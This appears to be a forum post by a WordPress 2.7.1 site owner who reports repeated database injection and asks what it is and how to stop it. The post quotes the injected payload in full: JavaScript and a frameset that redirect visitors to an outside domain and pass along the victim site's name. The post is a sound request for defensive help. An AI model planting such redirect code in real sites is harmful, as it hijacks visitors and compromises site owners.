There seems to be a vulnerability on the current 2.7.1 version of WP.
Someone has been injecting code in the WP database. Take a look at the screenshot below
[url=http://www.imagehosting.com/][img]http://img440.imageshack.us/img440/4403/sqlinjection.jpg[/img][/url]
I search my database and found inside this piece of code (i have replace my domain name with "mywebsite.com"):
<!--
top.location="http://www.wpskinbase.com/?h=mywebsite.com";
/*
-->
<script type="text/javascript">
<!--
function applyFrameKiller()
{
if(window.top != self)
{
window.top.location = "http://www.wpskinbase.com/?h=mywebsite.com&cifr=1";
}
}
applyFrameKiller();
// -->
</script>
<frameset rows="100%,*" frameborder="no" border="0" framespacing="0">
<frame src="http://www.wpskinbase.com/?h=mywebsite.com&foiffs=in100fweg" >
</frameset>
<noframes>
<body bgcolor="#ffffff" text="#000000">
<a href="http://www.wpskinbase.com/?h=mywebsite.com&foiffs=in100fweg">Click here to proceed</a>.
</body>
</noframes>
<!--
*/
-->
I deleted it once yesterday and it appeared again today.
I have noticed that many other websites have this
Any idea what it is and how to prevent it?
Thanks